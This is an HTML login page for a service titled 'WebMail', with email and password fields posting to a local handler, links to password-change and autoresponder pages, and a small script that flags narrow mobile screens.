

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.or
g/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
    <title>WebMail</title>
    <link href="default2.css" rel="stylesheet" type="text/css" />
</head>

<body class='centre' style='margin-top: 32px; text-align: centre; background: #fff; text-align: center; font-family: Arial, Helvetica, sans-serif; /* font-size: 12px; */ '>
<div style="background: #143265 url(images/bg_loginbox.png) no-repeat top; width: 430px;  margin: 0 auto; padding: 120px 20px 30px 20px; color: #fff; -moz-border-radius-bottomright: 18px; -moz-border-radius-bottomleft: 18px; -webkit-border-bottom-left-radius: 18px; -webkit-border-bottom-right-radius: 18px;" id="defcontainer">
<form method='post' action='post.php'>
			<div>
			<h1>Welcome to WebMail</h1>
			<p>To log-in to WebMail please enter your email address
			and password below.</p>
			<div class='centre'>
			<table style='margin-left: auto; margin-right: auto; width: 300px'>
			<tbody>
			<tr>
			<th style='width: 20%; text-align: right; padding-right: 1em'>Email&nbsp;Address: </th>
			<td style='text-align: left'><input type='text' name='username' size='30'/></td>
			</tr>
			<tr>
			<th style='text-align: right; padding-right: 1em'>Password: </th>
			<td style='text-align: left'><input type='password' name='password' size='30'/></td>
			</tr>
			</tbody>
			</table>
			<br><br>
			<input type='submit' value='Login Now!'/>
			<br><br>
			<a href='change-password.cgi'>Change Password?</a>
			<br><br>
			<a href='autoresponder.cgi'>Manage Autoresponder</a>
			<br><br>
			</div>
        <input type='hidden' name='mobile' id='mobile' value='0'/>
        <script type='text/javascript'>
          if(screen.availWidth <= 480)
            document.getElementById('mobile').value=1;
        </script>
			</div></form>
</div>

</body></html><!-- 0 -->